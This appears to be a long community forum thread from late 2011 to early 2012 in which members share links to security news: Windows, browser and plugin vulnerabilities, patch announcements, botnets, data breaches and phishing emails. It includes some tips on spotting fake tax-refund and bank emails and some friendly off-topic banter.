Microsoft Windows win32k.sys Memory Corruption Vulnerability
http://secunia.com/advisories/47237/
-
Microsoft Windows win32k.sys Memory Corruption Vulnerability
http://secunia.com/advisories/47237/
Looks like it's only a problem if you use the Safari browser in Windows 7.
-
That would be my view of it as well, but the secunia report isn't very clear.
Solution
No effective solution is currently available.
If it only effects Safari, then the solution would be to use a different browser until Apple patch the Safari browser.
They also said it might effect other OS versions, but confirmed on win7 64bit fully patched.
-
That would be my view of it as well, but the secunia report isn't very clear.
Here's a little bit more info...
http://www.h-online.com/security/news/item/Highly-critical-zero-day-vulnerability-in-Windows-discovered-1398625.html
-
Interesting only in win7 64bit not win7 32bit and not confirming if this has been found in any other browser, so the assumption is that other browsers aren't effected ???
-
Second time around that the British Amnesty site has been infected with java malware. Good thing, avast detects. Read: http://www.barracudalabs.com/wordpress/index.php/2011/12/22/authoritarian-regime-uses-human-rights-group-to-spy-on-activists/
link article author = Paul Royal, Research Consultant
polonus
-
TDL3 infection paired with rougues i have seen today a pair of computers at my workstation that are paired with rootkit..hopefully they are fairly easy to remove so dont forget to run TDSSKiller after taking care of a FakeAV. ;)
-
TDL3 infection paired with rougues i have seen today a pair of computers at my workstation that are paired with rootkit..hopefully they are fairly easy to remove so dont forget to run TDSSKiller after taking care of a FakeAV. ;)
And where is this workstation ? your study desk in your bedroom.
-
Interesting only in win7 64bit not win7 32bit and not confirming if this has been found in any other browser, so the assumption is that other browsers aren't effected ???
MS confirmed that IE prior to version 9 is also affected.
-
I suspected this was going to extend to other browsers, though is that still related to IE browsers win7 x64 though.
-
I suspected this was going to extend to other browsers, though is that still related to IE browsers win7 x64 though.
Yes, x64 only atm, but they also admit that it could be misused without any browser as well.
They changed the info (Chief Security Advisor Blog) quite frequently lately. ;)
-
And where is this workstation ? your study desk in your bedroom.
No its beside my house where we all work together on infected computers ;)
-
And where is this workstation ? your study desk in your bedroom.
No its beside my house where we all work together on infected computers ;)
In the fresh air , great place to work, Craig is only jealous as he has to use a 10 year old laptop situated in the dunny. ;D
-
Back on topic guys...!! ;)
-
And where is this workstation ? your study desk in your bedroom.
No its beside my house where we all work together on infected computers ;)
In the fresh air , great place to work, Craig is only jealous as he has to use a 10 year old laptop situated in the dunny. ;D
It maybe a laptop in the dunny ( most comfortable seat in the house ) but if you knew how to read signitures you would see that it isn't 10 years old ;D
-
Millions of printers open to devastating hack attack
http://redtape.msnbc.msn.com/_news/2011/11/29/9076395-exclusive-millions-of-printers-open-to-devastating-hack-attack-researchers-say
http://www.hp.com/hpinfo/newsroom/press/2011/111129b.html
HP LaserJet Firmware Update Now Available
http://www.hp.com/hpinfo/newsroom/press/2011/111223xa.html
-
And where is this workstation ? your study desk in your bedroom.
No its beside my house where we all work together on infected computers ;)
In the fresh air , great place to work, Craig is only jealous as he has to use a 10 year old laptop situated in the dunny. ;D
It maybe a laptop in the dunny ( most comfortable seat in the house ) but if you knew how to read signitures you would see that it isn't 10 years old ;D
Hardly, that's one of the best laptops currently available.
-
Laugh, I nearly wet myself. HM Revenue & Customs refund for £1400.
Got a probable phishing/malware social engineering email, detected as spam by the simplest of filters in my MailWasher Pro anti-spam. Great that the UK HM Revenue & Customs would be sending their email from the Netherlands ;D
My filter is Not to me, couldn't be more basic if the email isn't directed sent to one of my email addresses, it gets flagged (image1).
I really can't understand how people can get conned by these types of thing as they are so easy to spot. When do you get informed of a tax refund when it is to To: undisclosed-recipients:;. Email headers are an absolute joke (image2). And finally the obligatory claim refund directing you to the crooks, image3).
I'm going to let it through to see what avast makes of it ;D
EDIT, no alert by avast as it appears there is only the link (social engineering) to the Russian domain, where you are likely to get a nasty surprise (which hopefully the dumb would be protected by the network or web shields).
-
Fidel Castro not dead.....again...malware ;)
http://www.euronews.net/2012/01/03/beware-twitter---castro-not-dead-again-/
-
WordPress 3.3.1 closes XSS hole
http://www.h-online.com/security/news/item/WordPress-3-3-1-closes-XSS-hole-1403297.html
-
OpenSSL Security Advisory
http://openssl.org/news/secadv_20120104.txt
-
WiFi Setup Flaw Allows Easy Router PIN Guessing
http://blogs.norman.com/2012/for-consumption/wifi-setup-flaw-allows-easy-router-pin-guessing
What Does Malware Look Like? ;D
http://blogs.norman.com/2011/for-consumption/have-a-safe-new-year
-
WiFi Setup Flaw Allows Easy Router PIN Guessing
http://blogs.norman.com/2012/for-consumption/wifi-setup-flaw-allows-easy-router-pin-guessing
More here: http://forum.avast.com/index.php?topic=66267.msg726442#msg726442
-
Patch Tuesday heads-up: Windows security holes
Microsoft plans to ship 7 bulletins, one rated “critical,” Microsoft’s highest severity rating.
Microsoft’s first batch of patches for 2012 will include fixes for security vulnerabilities in the Windows operating system and Microsoft Developer Tools and Software.
Microsoft also announced that one of the bulletins will fix an issue described as a “Security Feature Bypass.” It is the first time Microsoft has used this label on a security update.
The patches will be released next Tuesday (Jan 10, 2012) at approximately 1:00 PM EST.
-
"Lilupophilupop" infects a million URLs
http://www.h-online.com/security/news/item/Lilupophilupop-infects-a-million-URLs-1404812.html
http://isc.sans.org/diary/Lilupophilupop%2Btops%2B1million%2Binfected%2Bpages/12304
https://isc.sans.edu/diary.html?storyid=12127
-
Patch Tuesday heads-up: Windows security holes
Microsoft plans to ship 7 bulletins, one rated “critical,” Microsoft’s highest severity rating.
The patches will be released next Tuesday (Jan 10, 2012) at approximately 1:00 PM EST.
http://technet.microsoft.com/en-us/security/bulletin/ms12-jan
-
"Lilupophilupop" infects a million URLs
http://www.h-online.com/security/news/item/Lilupophilupop-infects-a-million-URLs-1404812.html
http://isc.sans.org/diary/Lilupophilupop%2Btops%2B1million%2Binfected%2Bpages/12304
https://isc.sans.edu/diary.html?storyid=12127
Well another day and a different SQL injection attack, not much difference from the last big one. There are many pro-active measures that can be followed as are mentioned in the 2nd article. Firefox with NoScript for the injected script tag is another measure.
Not to mention avast was all over the last SQL injection incident like a rash, with many people reporting sites being alerted on by avast when they were reputable/clean (NOT). So I guess we will have the same rash of hits in the viruses and worms forum claiming FPs.
-
So I guess we will have the same rash of hits in the viruses and worms forum claiming FPs.
Most likely. ;)
-
Ramnit Virus has stolen 45000 Facebook Login Credentials Worldwide
http://www.techgadgetsweb.com/6678/ramnit-virus-stolen-45000-facebook-login-credentials-worldwide
-
Ramnit Virus has stolen 45000 Facebook Login Credentials Worldwide
http://www.techgadgetsweb.com/6678/ramnit-virus-stolen-45000-facebook-login-credentials-worldwide
More here: http://blog.seculert.com/2012/01/ramnit-goes-social.html
-
Huge Security Breach at Security Firm Symantec No Threat to Consumers, Analyst Says
Hacked my some Indian Hackers :P
http://www.foxnews.com/scitech/2012/01/06/symantec-source-code-theft-likely-no-threat-to-average-user-analyst-says/?google_editors_picks=true
-
FBI warns of new Zeus-based malware in phishing scam
http://www.networkworld.com/news/2012/010612-gameover-malware-254623.html
http://www.ehackingnews.com/2012/01/newer-variant-of-zeus-malware-game-over.html
http://krebsonsecurity.com/2011/11/ddos-attacks-spell-gameover-for-banks-victims-in-cyber-heists/
GameOver With Just One Click
http://blogs.norman.com/2012/for-consumption/gameover-with-just-one-click
-
Convicted murderer gets new trial after computer virus destroys data
http://nakedsecurity.sophos.com/2012/01/04/convicted-murderer-trial-virus/
-
Well the fake HM Revenue & Customs Tax Refund email I reported on the 2nd Jan finally made the papers now. It turns out that HM Revenue & Customs have known about this for some time and have shut down 149 sites (I believe that is the number, but of that order).
Why the hell didn't they make it public sooner is what I have to ask.
####
Following hard on its heals is yet another fake email, social engineering, phishing attempt, this time for Santander bank, "Account blocked: Confirmation required" as the subject.
Yet again easy to spot (not least because I don't have a Santander account ;D) but banks just don't pull these sort of strokes asking for information in this way. If you have any doubt that it might actually be legit, then logon to your bank in the normal way not via a link in an email.
The link in the email is easy to see is fraudulent, if you only look, hover the mouse over the link and look at the status bar or the email program where the true URL is displayed. For me using MailWasher it displays the underlying URL which stick out like balls on a plate (image).
The email headers also shoe that it doesn't come from who they purport to be.
It also used an email address that I wouldn't use for banking, my filtering email which I use for non-trusted sources like banking.
So stay alert, stay suspicious, stay safe as there will be another along soon with a slightly different format.
-
Signed malware: Snooping on Chinese students?
http://blogs.norman.com/2012/malware-detection-team/signed-malware-snooping-on-chinese-students
By redirecting the address to a different IP, attackers are able to present users with altered web content or perform man-in-the-middle attacks. The purpose of this against a student site is up for speculation.
I wonder what the reason can be......hmmmmm ;D
-
Microsoft Patches Critical Windows Drive-by Bug
http://blogs.norman.com/2012/security-exposed/microsoft-patches-critical-windows-drive-by-bug
Did You Think Email Is Threat Free? Think Again
http://blogs.norman.com/2012/security-exposed/did-you-think-email-is-threat-free-think-again
-
Zappos Hack Believed To Have Affected Millions
http://online.wsj.com/article/BT-CO-20120116-706917.html (http://online.wsj.com/article/BT-CO-20120116-706917.html)
I received a letter from them today telling me of the attack.
I bought some boots from them not to long ago. :'( (The boots are great.)
-
Zappos Hack Believed To Have Affected Millions
More here: http://www.h-online.com/security/news/item/Customer-data-exposed-in-Zappos-com-breach-1413676.html
-
Critical hole in McAfee products still open after more than 180 days
http://www.h-online.com/security/news/item/Critical-hole-in-McAfee-products-still-open-after-more-than-180-days-1413775.html
-
Oracle Critical Patch Update Advisory - January 2012
http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html
-
Typosquatting and Doppelgangers Pose Danger to Enterprises
http://blogs.norman.com/2012/security-exposed/typosquatting-and-doppelgangers-pose-danger-to-enterprises
Check Out Who Has Access to Your Social Media Accounts
http://blogs.norman.com/2012/for-consumption/check-out-who-has-access-to-your-social-media-accounts
-
New stealthy botnet Trojan holds Facebook users hostage
http://www.theregister.co.uk/2012/01/18/carberp_steals_e_cash_facebook/
Five Koobface botnet suspects named by New York Times
http://www.theregister.co.uk/2012/01/18/koobface_prime_suspect_outed/
-
Five Koobface botnet suspects named by New York Times
http://www.theregister.co.uk/2012/01/18/koobface_prime_suspect_outed/
Virus infections stop after suspects named
http://www.reuters.com/article/2012/01/19/us-facebook-cybersecurity-idUSTRE80I05720120119
-
McAfee software bug could turn customers' PCs into spam servers
http://www.theage.com.au/technology/security/mcafee-software-bug-could-turn-customers-pcs-into-spam-servers-20120120-1q93b.html
-
FBI shuts down Megaupload.com, Anonymous shut down FBI
http://www.heraldsun.com.au/fbi-shuts-down-megauploadcom-charges-seven-with-online-piracy/story-e6frfro0-1226249114650
-
more on the above......
FBI charges Megaupload operators with piracy crimes
http://news.cnet.com/8301-31001_3-57362152-261/fbi-charges-megaupload-operators-with-piracy-crimes/
Justice Department Charges Leaders of Megaupload with Widespread Online Copyright Infringement
http://www.fbi.gov/news/pressrel/press-releases/justice-department-charges-leaders-of-megaupload-with-widespread-online-copyright-infringement
-
http://www.theregister.co.uk/2012/01/05/ramnit_social_networking/
http://www.theregister.co.uk/2011/09/12/tdss_rented_botnet_shenanigans/
-
X.org server allows anyone to unlock computer
http://www.h-online.com/open/news/item/X-org-server-allows-anyone-to-unlock-computer-1417864.html
-
Anonymous's new weapon
http://www.h-online.com/security/news/item/Anonymous-s-new-weapon-1418337.html
-
Another reason for having NoScript ;D
-
http://www.theregister.co.uk/2012/01/05/ramnit_social_networking/
http://www.theregister.co.uk/2011/09/12/tdss_rented_botnet_shenanigans/
@true indian
already posted...see reply #1717...... check the date on the news before you post ::)
-
Linux root exploit due to memory access
http://www.h-online.com/security/news/item/Linux-root-exploit-due-to-memory-access-1419834.html
-
DreamHost - Changing Shell/FTP Passwords due to Security Issue
http://www.dreamhoststatus.com/2012/01/20/changing-ftpshell-passwords-due-to-security-issue/
-
more Megaupload.....seems he made a couple of bucks on this ;D
Dotcom's lavish life of parties and luxury
http://www.nzherald.co.nz/nz/news/article.cfm?c_id=1&objectid=10780514
http://video.google.com/videoplay?docid=8890260472062277672#
-
http://www.eweek.com/c/a/Security/Symantec-Warns-pcAnywhere-Users-to-Disable-Tool-Due-to-Source-Code-Theft-336440/
Symantec Warns pcAnywhere Users to Disable Tool Due to Source Code Theft
Symantec has confirmed that pcAnywhere users are at "increased risk" because attackers had stolen source code to the remote control tool
The saga over Symantec's stolen code took another twist as the company acknowledged that pcAnywhere customers are at risk for man-in-the-middle attacks and new exploits.
The breach actually occurred on Symantec servers in 2006 and attackers stole source code to several Norton security products and the pcAnywhere remote access tool, Symantec confirmed last week. At the time, the company assured customers that there was no risk to the products because the source code was so old and the company had made security improvements over the past six years.......... (more)
-
O2 sends users' phone numbers to web sites
http://www.h-online.com/security/news/item/O2-sends-users-phone-numbers-to-web-sites-1421553.html
-
Cisco IronPort Appliances Telnet Remote Code Execution Vulnerability
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport
-
Now you have your 20 posts, you don't have to swamp the topic with death by single post and you can post multiple entries per post as opposed to one every few minutes.
-
I know I can put multiple news stories in one post. However, since one person posted at least three times in a row in this thread, I thought that maybe it was acceptable for me to put only one news story per post. I also needed 20 posts so that I could set a profile picture, my birthday, my location, my gender, a website, and the time. If I had seen a post saying to put multiple news stories in one post, wait for someone else to post, and then post again, I wouldn't have posted as many times as I did.
I found a Secunia advisory about a vulnerability in the Syneto UTM operating system. It has not been patched. The advisory was released on January 27. The URL is http://secunia.com/advisories/47609.
-
Just a heads-up: Posting for (essentially) the sole purpose of increasing post count is definitely frowned upon here.
-
I found a Secunia advisory about a vulnerability in the Syneto UTM operating system. It has not been patched. The advisory was released on January 27. The URL is http://secunia.com/advisories/47609.
you're probably a "Syneto UTM" addict ???
-
I have decided to put quotes of all of the posts I made in this thread yesterday. I have decided to do this in case someone who is able to do so wants to remove the 14 posts I made in this thread yesterday, and in case anyone finds it easier to read the content of the posts I made in one post.
Post 1 of 14:
I found an article named NY Public Service Commission Acknowledges Security Breach, and the URL is http://thedailyattack.com/2012/01/27/ny-public-service-commission-acknowledges-security-breach/.
Post 2 of 14:
I found an article named Facebook sues alleged clickjacking spammer sparking row, and the URL is http://www.bbc.co.uk/news/technology-16755434.
Post 3 of 14:
I found an article named The real danger of the Zappos security breach, and the URL is http://www.courant.com/business/custom/consumer/hc-ls-zappos-20120128,0,3409169.story.
Post 4 of 14:
I found an article named Drive-By-Download Attack Exploits Critical Vulnerability in Windows Media Player, and the URL is http://www.csoonline.com/article/698951/drive-by-download-attack-exploits-critical-vulnerability-in-windows-media-player.
Post 5 of 14:
I found an article named Linux vendors urgently patch a security flaw, which is located at http://www.theinquirer.net/inquirer/news/2141626/linux-vendors-urgently-patch-security-flaw.
Post 6 of 14:
I found an article named Sonos warns of Wireless HiFi System security flaw, and the URL is http://www.expertreviews.co.uk/audio/1289884/sonos-warns-of-wireless-hifi-system-security-flaw.
Post 7 of 14:
I found an article named Google squashes security bugs in Chrome, pays over $6,000 in bounties at http://www.infosecurity-magazine.com/view/23479/google-squashes-security-bugs-in-chrome-pays-over-6000-in-bounties/.
Post 8 of 14:
I found an article named OS X Lion Includes Serious New Security Vulnerability. The URL is http://www.macguru.biz/os-x-lion-includes-serious-new-security-vulnerability/.
Post 9 of 14:
I found the story XSS Vulnerability Found in Google, Forbes, Myspace, MTV and Ferrari at http://news.softpedia.com/news/XSS-Vulnerability-Found-in-Google-Forbes-Myspace-MTV-Ferrari-248996.shtml.
Post 10 of 14:
I found an article named Hacker Finds Flaw in Gay-Dating Smartphone App at http://www.msnbc.msn.com/id/46133353/ns/technology_and_science-security/t/hacker-finds-flaw-gay-dating-smartphone-app/.
Post 11 of 14:
I found an article named Vlingo Privacy Breach: Data Sent to Remote Servers Without Consent at http://www.androidpit.com/en/android/blog/401784/Vlingo-security-flaw.
Post 12 of 14:
I found the story OpenSSL fixes flaw introduced in anti-decryption update located at http://www.computerworlduk.com/news/security/3331862/openssl-fixes-flaw-introduced-in-anti-decryption-update/.
Post 13 of 14:
I found the story Security Flaws Found in WordPress Setup at http://www.esecurityplanet.com/network-security/security-flaws-found-in-wordpress-setup.html.
Post 14 of 14:
I found the story Hackers Breached Railway Network, Disrupted Service at http://www.wired.com/threatlevel/2012/01/railyway-hack/.
Just a heads-up: Posting for (essentially) the sole purpose of increasing post count is definitely frowned upon here.
I don't plan on double posting or posting three or more times in a row on this forum anymore. I wanted to edit some parts of my profile, but I wasn't able to do so. I later discovered that I needed to have at least 20 posts. Since one person posted at least three times in a row, I decided to put one news article per post. My intention was not to annoy anyone.
I found a Secunia advisory about a vulnerability in the Syneto UTM operating system. It has not been patched. The advisory was released on January 27. The URL is http://secunia.com/advisories/47609.
you're probably a "Syneto UTM" addict ???
I am not. I don't recall ever hearing of that operating system until today. I added that to my post because I wanted to avoid posting off-topic. I use Windows 7 Home Premium.
-
Android.Counterclank Found in Official Android Market
http://www.symantec.com/connect/blogs/androidcounterclank-found-official-android-market
Symantec's trojan warning criticised as scaremongering
http://www.h-online.com/security/news/item/Symantec-s-trojan-warning-criticised-as-scaremongering-1424809.html
http://blog.mylookout.com/blog/2012/01/27/lookout%E2%80%99s-take-on-the-%E2%80%98apperhand%E2%80%99-sdk-aka-android-counterclank/
-
HTC Android phones expose Wi-Fi passwords to apps
http://www.h-online.com/security/news/item/HTC-Android-phones-expose-Wi-Fi-passwords-to-apps-1427099.html
http://blog.mywarwithentropy.com/2012/02/8021x-password-exploit-on-many-htc.html
-
http://www.bbc.co.uk/news/technology-16812064
Hackers outwit online banking identity security systems
Criminal hackers have found a way round the latest generation of online banking security devices given out by banks, the BBC has learned.
After logging in to the bank's real site, account holders are being tricked by the offer of training in a new "upgraded security system".
Money is then moved out of the account but this is hidden from the user.
Experts say customers should follow banks' official advice, use up-to-date anti-virus software and be vigilant.....(more)
-
Key Internet operator VeriSign hit by hackers
http://www.reuters.com/article/2012/02/02/us-hacking-verisign-idUSTRE8110Z820120202
-
Megaupload Shutdown Has A Silver Lining
http://blogs.norman.com/2012/for-consumption/megaupload-shutdown-has-a-silver-lining
-
Kelihos botnet BACK FROM THE DEAD
Bloodied spam-spewing zombie staggers in
http://www.theregister.co.uk/2012/02/02/kelihos_botnet_returns/
Trojan smuggles out nicked blueprints as Windows Update data
Malware backdoors government-targeted kit 'using Adobe 0-days'
http://www.theregister.co.uk/2012/02/01/spear_phishing_rats/
Virus-slingers abuse WordPress vulns, dose punters with exploit
Blogs also infected with information-harvesting Trojan
http://www.theregister.co.uk/2012/01/31/wordpress_vuln_phoenix/
-
@Pondus,
What vulnerabilities are being abused by the latest Hierarcy Exploit pack? To find out, read here:
http://malwareint.blogspot.com/search?updated-min=2012-01-01T00:00:00-07:00&updated-max=2013-01-01T00:00:00-07:00&max-results=2 (link- malware intelligence; link author = Steven K (X Y L I T O L) Malware Research),
polonus
-
Will the bad guys at india ever learn? ::) what a shame :'(
Indian military computers hacked, Symantec source code leaked
http://www.techspot.com/news/46990-indian-military-computers-hacked-symantec-source-code-leaked.html
-
Will the bad guys at india ever learn? ::) what a shame :'(
Indian military computers hacked, Symantec source code leaked
Old news..!! ;)
http://forum.avast.com/index.php?topic=52252.msg727906#msg727906
-
Secret Service Investigates Sophisticated $250 Million Cell Phone Cloning Scheme
http://blog.dhs.gov/2012/02/secret-service-investigates.html
-
Joomla! updates close information disclosure holes
http://www.h-online.com/security/news/item/Joomla-updates-close-information-disclosure-holes-1429303.html
-
Hackers wanted $50,000
http://news.cnet.com/8301-1009_3-57372308-83/hackers-wanted-$50000-to-keep-symantec-source-code-private/?tag=mncol;topStories
Anonymous Leaks Symantec’s pcAnywhere Source Code
http://news.softpedia.com/news/Anonymous-Leaks-Symantec-s-pcAnywhere-Source-Code-251237.shtml
-
Save Your Internet: DNSChanger Trojan Switch-Off Issues
http://blogs.norman.com/2012/for-consumption/save-your-internet-dnschanger-trojan-switch-off-issues
-
Save Your Internet: DNSChanger Trojan Switch-Off Issues
I found this informationFor English speaking users: Your system is not affected by the DNSChanger trojan malware. For more information on this topic please visit the FBI website.
http://www.dns-ok.de
-
MRG Effitas Online Banking Test Featured on BBC Click
http://www.youtube.com/watch?feature=player_embedded&v=EUGTlVSefeo#!
-
Iran Reportedly Cuts Off Access to Secure Internet Sites
http://www.pcmag.com/article2/0,2817,2400102,00.asp
-
Have your accounts been compromised? There’s a simple way to find out
http://blogs.norman.com/2012/for-consumption/have-your-accounts-been-compromisedtheres-a-simple-way-to-find-out
Have your accounts been compromised? Find out. - https://pwnedlist.com/
-
Microsoft Security Bulletin Advance Notification for February 2012
http://technet.microsoft.com/en-us/security/bulletin/ms12-feb
-
Something fishy about Google Chrome's Safe Browsing API, lab says
http://www.networkworld.com/news/2012/020712-something-fishy-about-google-chromes-255830.html (http://www.networkworld.com/news/2012/020712-something-fishy-about-google-chromes-255830.html)
Google Chrome will no longer check for revoked SSL certificates online
http://www.networkworld.com/news/2012/020812-google-chrome-will-no-longer-255877.html (http://www.networkworld.com/news/2012/020812-google-chrome-will-no-longer-255877.html)
-
Google Chrome will no longer check for revoked SSL certificates online
thanks, that's interesting and worrying.
-
Google Wallet's PIN fails to fully protect
http://www.h-online.com/security/news/item/Report-Google-Wallet-s-PIN-fails-to-fully-protect-Update-1432289.html
-
Mozilla closes critical security hole in Firefox, Thunderbird and Seamonkey
http://www.h-online.com/security/news/item/Mozilla-closes-critical-security-hole-in-Firefox-Thunderbird-and-Seamonkey-1433248.html
https://www.mozilla.org/security/announce/2012/mfsa2012-10.html
-
Valve: hackers may have gained access to Steam transactions
http://www.h-online.com/security/news/item/Valve-hackers-may-have-gained-access-to-Steam-transactions-1433423.html
http://store.steampowered.com/news/7323/
-
Oracle Java SE Critical Patch Update Advisory - February 2012
http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html
-
Whoops! Texting accident goes viral
http://media.theage.com.au/entertainment/weird-week/whoops-texting-accident-goes-viral-3050318.html
-
Whoops! Texting accident goes viral
< clip >
Stupidity related YES Security related NO
-
Vulnerability in libpng prompts Firefox and Thunderbird updates
http://www.h-online.com/open/news/item/Vulnerability-in-libpng-prompts-Firefox-and-Thunderbird-updates-1436810.html
-
Cutwail botnet back in action
http://www.h-online.com/security/news/item/Cutwail-botnet-back-in-action-1437644.html
-
I was looking for something relevant to post in this thread and I came across something that surprised me. Under certain circumstances, a security flaw with an iPhone running iOS 5 can be exploited to gain access to contacts on the phone. The URL is http://technolog.msnbc.msn.com/_news/2012/02/21/10467826-paperclips-pose-security-threat-to-iphones.
-
Intego finds new, insidious strain of Mac Flashback Trojan horse
http://www.macworld.com/article/165534/2012/02/intego_finds_new_insidious_strain_of_mac_flashback_trojan_horse.html
-
Et Tu, Google? Android Apps Can Also Secretly Copy Photos
http://bits.blogs.nytimes.com/2012/03/01/android-photos/
-
Bitcoinica Warning: Please do not re-use any old Bitcoin deposit addresses
https://www.bitcoinica.com/posts/warning-please-do-not-re-use-and-old-bitcoin-deposit-addresses (https://www.bitcoinica.com/posts/warning-please-do-not-re-use-and-old-bitcoin-deposit-addresses)
http://status.linode.com/2012/03/manager-security-incident.html (http://status.linode.com/2012/03/manager-security-incident.html)
-
GitHub security incident highlights Ruby on Rails problem
http://www.h-online.com/open/news/item/GitHub-security-incident-highlights-Ruby-on-Rails-problem-1463207.html
-
Adobe updates Flash Player closing more critical holes
http://www.h-online.com/security/news/item/Adobe-updates-Flash-Player-closing-more-critical-holes-1464247.html
-
Anonymous takes down security firm's website (Panda), vows to fight on after arrests
Computerworld - Hackers claiming to belong to the Anonymous hacking collective early Wednesday defaced Panda Security's PandaLabs website in apparent response to the arrests of five hackers Tuesday in the U.K. and the U.S.
http://www.computerworld.com/s/article/9224958/Anonymous_takes_down_security_firm_s_website_vows_to_fight_on_after_arrests
-
CanSecWest Pwnium: Google Chrome hacked with sandbox bypass
https://www.zdnet.com/blog/security/cansecwest-pwnium-google-chrome-hacked-with-sandbox-bypass/10563
-
CanSecWest Pwnium: Google Chrome hacked with sandbox bypass
https://www.zdnet.com/blog/security/cansecwest-pwnium-google-chrome-hacked-with-sandbox-bypass/10563
already fixed ;D http://googlechromereleases.blogspot.com/2012/03/chrome-stable-channel-update.html
-
Microsoft Security Bulletin Advance Notification for March 2012
http://technet.microsoft.com/en-us/security/bulletin/ms12-mar
-
Pwn2Own 2012: IE 9 hacked with two 0day vulnerabilities
https://www.zdnet.com/blog/security/pwn2own-2012-ie-9-hacked-with-two-0day-vulnerabilities/10621
-
Who are these VUPEN guys. They took down Chrome, now IE and claim they also have hacks for Safari and Firefox. They also say they will only sell the hacks to their "customers". They sound more than a bit shady to me.
-
Global Malware Rates – Is Your Country Among The Safest Or Most Infected?
http://blogs.norman.com/2012/for-consumption/global-malware-rates-is-your-country-among-the-safest-or-infected
Lulzsec Arrests, Leader Sabu FBI Informant, Anonymous Retaliates
http://blogs.norman.com/2012/for-consumption/lulzsec-arrests-leader-sabu-fbi-informant-anonymous-retaliates
-
Feds shift DNSChanger cut-off deadline to July - Extra month granted to clean up infected gear
http://www.theregister.co.uk/2012/03/09/dnschanger_safety_net_extended/
-
MYSTERY programming language found in Duqu - Anti-virus boffins appeal to devs for help
http://www.theregister.co.uk/2012/03/08/duqu_trojan_mystery_code_riddle/
-
Researchers hack into newest Firefox with zero-day flaw
http://www.zdnet.com/blog/security/researchers-hack-into-newest-firefox-with-zero-day-flaw/10663
-
Malware Advancing Faster Than Companies Can Analyze It
http://www.darkreading.com/advanced-threats/167901091/security/news/232602289/malware-advancing-faster-than-companies-can-analyze-it.html
-
Patch Tuesday Targets Critical Windows Bug
http://blogs.norman.com/2012/security-exposed/patch-tuesday-targets-critical-windows-bug
-
Study analyses ten years of security holes
http://www.h-online.com/security/news/item/Study-analyses-ten-years-of-security-holes-1472674.html
-
Patch Tuesday Targets Critical Windows Bug
http://blogs.norman.com/2012/security-exposed/patch-tuesday-targets-critical-windows-bug
More here: http://blogs.technet.com/b/srd/archive/2012/03/13/cve-2012-0002-a-closer-look-at-ms12-020-s-critical-issue.aspx
-
Patch Tuesday Targets Critical Windows Bug
http://blogs.norman.com/2012/security-exposed/patch-tuesday-targets-critical-windows-bug
More here: http://blogs.technet.com/b/srd/archive/2012/03/13/cve-2012-0002-a-closer-look-at-ms12-020-s-critical-issue.aspx
Exploit circulating for Windows RDP vulnerability
http://www.h-online.com/security/news/item/Exploit-circulating-for-Windows-RDP-vulnerability-1474191.html
-
Mediyes – the dropper with a valid signature
https://www.securelist.com/en/blog/682/Mediyes_the_dropper_with_a_valid_signature
-
Again proven here how dangerous old unpatched java can be: https://www.securelist.com/en/blog/687/A_unique_fileless_bot_attacks_news_site_visitors#page_top
Link article author = Sergey Golovanov, Kaspersky Lab Expert, on Kasparsky's blog.
Use java only if you can not do without it and see to it is always being updated and fully patched via: http://secunia.com/vulnerability_scanning/online/
Also always install a decent AdBlocker add-on in your browser,
polonus
-
Poor Security Made Porn Site Hack Child’s Play
http://blogs.norman.com/2012/for-consumption/poor-security-made-porn-site-hack-childs-play
-
Fileless' malware installs into RAM - Exploit found in Russian adware invades process, doesn't install files
http://www.theregister.co.uk/2012/03/18/fileless_malware_found/
PoC code uses super-critical Windows bug to crash PCs - Crash code real, but Sabu worm rumours ... not so much
http://www.theregister.co.uk/2012/03/16/rdp_worm/
-
Address spoofing vulnerability in iOS's Safari
http://www.h-online.com/security/news/item/Address-spoofing-vulnerability-in-iOS-s-Safari-1476314.html
-
Embarrassing security failure at PayPal
http://www.h-online.com/security/news/item/Embarrassing-security-failure-at-PayPal-1477905.html
-
Don’t ignore this advice: Update your Windows now
http://blogs.norman.com/2012/for-consumption/dont-ignore-this-advice-update-your-windows-now
-
Shopping For Zero-Days: A Price List For Hackers' Secret Software Exploits
http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/
-
btw. this thread should be sticky :)
-
No need for it to be a sticky (there are enough of those already) as there is enough activity to keep it near the top.
-
Fake LinkedIn SPAM Emails Hide Trojan Horse
http://blogs.norman.com/2012/for-consumption/fake-linkedin-spam-emails-hide-trojan-horse
Hackers booby-trap WordPress site with botnet-weaving Trojan - Crooks lure punters in with LinkedIn lies
http://www.theregister.co.uk/2012/03/23/wordpress_vuln_botnet_exploit/
Trojan moves its configuration to Twitter, LinkedIn, MSDN and Baidu
http://blogs.norman.com/2012/security-research/trojan-moves-its-configuration-to-twitter-linkedin-msdn-and-baidu
New Malware Type, Old Security Threat
http://blogs.norman.com/2012/for-consumption/new-malware-type-old-security-threat
Microsoft takes down ZeuS botnets - Disrupted ... but not dismantled
http://www.theregister.co.uk/2012/03/26/zeus_botnet_takedown/
-
***
Microsoft Takes Down Botnets Of Online Banking Thieves
Microsoft (NSDQ:MSFT) has taken down a number of malware-spreading botnets that infected millions of computers worldwide and stole more than $100 million from financial institutions and other businesses.
Under the escort of U.S. Marshals and with a warrant from a federal judge, Microsoft and two other co-plaintiffs in a lawsuit against the unidentified botnet operators seized command-and-control servers in Lombard, Ill., and Scranton, Penn., the Redmond, Wash.-based software maker said late Sunday. A federal court in New York granted permission for the seizure, which included taking control of 800 domains used in the criminal network.
http://www.crn.com/news/security/232700255/microsoft-takes-down-botnets-of-online-banking-thieves.htm?cid=nl_crn
***
-
long time no see Charley ;)
-
***
Thanks ... Life got busy and I needed a break. ;)
***
-
NSA Chief: China Behind RSA Attacks
http://www.informationweek.com/news/government/security/232700341?cid=RSSfeed_IWK_News
-
New Java Attack Rolled into Exploit Packs
http://krebsonsecurity.com/2012/03/new-java-attack-rolled-into-exploit-packs/
-
New hackers, old name: LulzSec Reborn hacks servers
http://www.h-online.com/security/news/item/New-hackers-old-name-LulzSec-Reborn-hacks-servers-1485081.html
-
Targeted attacks on Mac users reported
http://www.h-online.com/security/news/item/Targeted-attacks-on-Mac-users-reported-1486906.html
-
***
Adobe Fixes Critical Security Flaws In Flash Player
If you have not updated Flash Player in the last 24 hours, you need to do so now.
Adobe Systems has released a Flash Player update that fixes two critical vulnerabilities and adds an automatic update feature.
